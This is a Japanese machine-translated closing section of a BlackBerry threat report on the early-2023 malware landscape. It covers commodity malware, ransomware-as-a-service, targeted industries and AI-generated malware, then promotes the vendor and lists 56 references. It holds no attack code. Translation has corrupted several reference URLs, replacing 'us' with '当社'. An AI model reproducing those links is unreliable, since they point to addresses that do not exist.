2023年の最初の数カ月は、既知の脅威の展開が増加するだけでなく、重要な新たな脅威が導入された。手ごろな価格の RaaS や MaaS により、初心者が脅威の担い手となりやすい状況が続いています。同時に、以前には見られなかったマルウェアのサンプル数が、前回の報告期間から50%増加しました。SEOポイズニングのような手法が広まりつつあり、ChatGPTのリリースは、AIが生成するマルウェアの脅威を前進させる画期的な出来事です。あらゆる業界、あらゆる種類のテクノロジーにおいて、脅威の状況はこれまでになく急速に拡大しています。この報告期間中に得られた主な成果と教訓は以下のとおりです:

  • ヘルスケアのデジタル化が進むにつれ、医療従事者にとってデバイスの安全確保と患者データの保護が急務となっている。時代遅れの安全でないインフラは脆弱性を生み、新しいテクノロジーはさらなるセキュリティ対策を必要とするリスクをもたらす可能性があります。デジタル化の進展に伴い、医療機器メーカー、ソフトウェア・ソリューション・プロバイダー、医療提供者を含む医療業界は、規制要件を満たし、患者データを保護するために、インフラ全体のサイバーセキュリティを優先する必要があります。
  • コモディティ型マルウェアは、低コストや無償など、さまざまな価格帯で提供されており、爆発的な成長を遂げています。その結果、あらゆる業界が、データの窃取、バックドアの作成、恐喝スキームの実行などを可能にする強力なコモディティ型不正プログラムの標的となっています。コモディティマルウェアは、さまざまなAPTグループ56によって広く使用されているため、特定のキャンペーンやインシデントを特定の脅威行為者に帰属させることはますます難しくなっています。防御者は、常に警戒を怠らず、一般的なコモディティマルウェアの全ファミリに対応する適切な追跡および監視の枠組みを確実に構築する必要があります。このフレームワークと適切なレイヤー防御メカニズムを組み合わせることで、組織を最大限に保護することができます。
  • 今報告期間中に最も標的となったのは、世界的な金融、ヘルスケア、食品・生活必需品小売業界の顧客である。これらの業界は必要不可欠なサービスを提供しており、そのエコシステムに何らかの障害が発生した場合、その地域だけでなく、地域、国、世界全体に波及する深刻な事態に発展する可能性がある。デジタルトランスフォーメーションが進み、業界内および業界間の相互接続性が高まっているため、リスクはさらに高まっている。

この急速に変化する環境において、マルウェアやサイバー攻撃から組織を守るには、以下の両方が必要である:

  • 既知および未知の脅威を認識し、プロアクティブにブロックすることが実証されている高度なAIベースの検出と応答。
  • 脅威行為者がお客様の業界を標的にする方法、脅威行為者が使用するツール、脅威行為者の動機について、詳細かつ正確なインテリジェンスを提供します。この文脈的、予測的、実行可能なサイバー脅威インテリジェンスは、組織に対する脅威の影響を軽減するのに役立ちます。

BlackBerry は、AI ベースの検知と対応、サイバー脅威インテリジェンスを含む包括的なサイバーセキュリティを提供します。当社のAI主導型ソリューションからの遠隔測定に基づき、他の公的および私的なインテリジェンスソースによって補完されたグローバルなBlackBerry Threat Research and Intelligenceチームは、攻撃、脅威行為者、悪意のあるキャンペーンに関する実用的な洞察を提供し、情報に基づいた意思決定と迅速な行動をサポートすることで、ビジネスの混乱を解消します。

リソース

現在、以下のBlackBerry に関するリソースがございます。

妥協の公的指標

BlackBerry Threat Research and Intelligence チームは、分析したキャンペーンに関連する公開 IoC (Indicator of Compromise) を GitHub の公開リポジトリで公開しています。当社の脅威レポート、ブログ、ホワイトペーパー(YARA や Sigma のルールなど)で言及されているすべての IoC およびその他の実用的な情報は、BlackBerry Threat Research and Intelligence の公開 GitHub でご覧いただけます。

パブリックルール

BlackBerry Threat Research and Intelligence チームは、本文書で取り上げた脅威の多くを特定するための YARA ルールを作成した。我々のYARA ルールは一般に公開されている。

MITREの共通テクニック

BlackBerry Threat Research and Intelligence チームは脅威を分析するために、複数の MITRE テクニック、イベント分析、テレメトリに依存している。MITRE テクニックの完全なリストは、このドキュメントの MITRE ATT&CK Navigator Layer にあります。

MITRE D3FEND 対策

攻撃手法と関連する対策の完全なリストは、GitHubリポジトリのBlogs and Reportsセクションにある。

参考文献

1 https://intel471.com/blog/privateloader-malware

2 https://www.darkreading.com/risk/breaking-down-the-propagate-code-injection-attack

3 https://www.semrush.com/blog/black-hat-seo/

4 https://www.bleepingcomputer.com/news/security/raccoon-stealer-is-back-with-a-new-version-to-steal-your-passwords/

5 https://attack.mitre.org/groups/G0127/

6 https://securityboulevard.com/2021/11/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware/

7 https://cert.gov.ua/article/405538

8 https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp

9 https://www.proofpoint.com/当社/blog/threat-insight/charting-ta2541s-flight

10 https://www.trendmicro.com/en_us/research/22/l/conti-team-one-splinter-group-resurfaces-as-royal-ransomware-wit.html

11 https://cybernews.com/news/silverstone-formula-one-ransomware/

12 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34527

13 https://www.ic3.gov/Media/News/2022/220420.pdf

14 https://www.developer.com/news/90-of-the-public-cloud-runs-on-linux/

15 https://www.interpol.int/en/Crimes/Cybercrime/Cryptojacking

16 https://blogs.juniper.net/en-当社/threat-research/dota3-is-your-internet-of-things-device-moonlighting

17 https://github.com/xmrig/xmrig

18 https://therecord.media/sysrv-a-new-crypto-mining-botnet-is-silently-growing-in-the-shadows

19 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35914

20 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4034

21 https://www.pwc.com/当社/ja/industries/health-industries/library/healthcare-trends.html#content-free-2-cbba

22 https://www.hhs.gov/sites/default/files/the-return-of-emotet.pdf

23 https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf

24 https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf

25 https://www.pcrisk.com/removal-guides/22190-mallox-ransomware

26 https://community.riskiq.com/article/d8b749f2

27 https://malpedia.caad.fkie.fraunhofer.de/actor/toddycat

28 https://blog.cyble.com/2023/03/21/notorious-sidecopy-apt-group-sets-sights-on-indias-drdo/

29 https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia

30 https://www.bleepingcomputer.com/news/security/a10-networks-confirms-data-breach-after-play-ransomware-attack/

31 https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

32 https://www.cbc.ca/news/politics/ukraine-energy-minister-interview-rbl-1.6759503

33 https://www.weforum.org/agenda/2022/10/europe-is-energy-sector-resilience-cyber-risk/

34 https://www.scmagazine.com/brief/ransomware/encino-energy-claims-no-impact-from-alphv-ransomware-attack

35 https://www.bleepingcomputer.com/news/security/colombian-energy-supplier-epm-hit-by-blackcat-ransomware-attack/

36 https://www.politico.com/news/2023/02/14/russia-malware-electric-gas-facilities-00082675

37 https://www.intezer.com/blog/malware-analysis/teamtnt-cryptomining-explosion/

38 https://www.bleepingcomputer.com/news/security/new-esxiargs-ransomware-version-prevents-vmware-esxi-recovery/

39 https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/

40 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974

41 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0199

42 https://attack.mitre.org/groups/G0099/

43 https://therecord.media/alphv-blackcat-posted-data-ireland-munster-technical-university/

44 https://siliconangle.com/2023/02/27/lockbit-3-0-remains-active-threat-actor-ransomware-attacks-drop-january/

45 https://twitter.com/vxunderground/status/1618885718839001091?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1618885718839001091%7Ctwgr%5E17f722ab4987b5ab09fa407c10ae2ec4a25bb4ee%7Ctwcon%5Es1_&ref_url=https%3A%2F%2Fheimdalsecurity.com%2Fblog%2Flockbit-uses-conti-based-encryptor%2F

46 https://inquest.net/blog/2023/02/27/youve-got-malware-rise-threat-actors-using-microsoft-onenote-malicious-campaigns

47 https://github.com/SigmaHQ/sigma

48 https://www.kmu.gov.ua/en/news/german-galushchenko-vistupiv-na-nadzvichajnomu-zasidanni-ministriv-energetiki-yes

49 https://cip.gov.ua/en/news/u-2022-roci-kilkist-zareyestrovanikh-kiberincidentiv-virosla-maizhe-vtrichi-zvit

50 https://cert.gov.ua/article/3718487

51 https://www.welivesecurity.com/2023/02/24/year-wiper-attacks-ukraine/

52 https://blog.google/threat-analysis-group/fog-of-war-how-the-ukraine-conflict-transformed-the-cyber-threat-landscape/

53 https://openai.com/blog/chatgpt

54 https://research.checkpoint.com/2023/opwnai-cybercriminals-starting-to-use-chatgpt/

55 https://www.cyberark.com/resources/threat-research-blog/chatting-our-way-into-creating-a-polymorphic-malware

56 https://threatpost.com/apt-commodity-rats-microsoft-bug/175601/

本レポートのデータはBlackBerry Cybersecurity telemetryによって作成されたものであり、BlackBerry Limitedの所有物である。

本レポートに含まれる情報は、教育目的のみを目的としています。ブラックベリーは、本レポートで言及されている第三者の記述や調査の正確性、完全性、信頼性について保証するものではなく、責任を負うものでもありません。本レポートに記載された分析は、当社のリサーチアナリストによる入手可能な情報の現時点での理解を反映したものであり、追加情報が当社 に知らされた場合、変更される可能性があります。読者は、本情報を私生活および職業生活に適用する際には、各自で十分な注意を払う責任があります。BlackBerry は、本レポートに掲載された情報の悪意ある使用または誤用を容認するものではありません。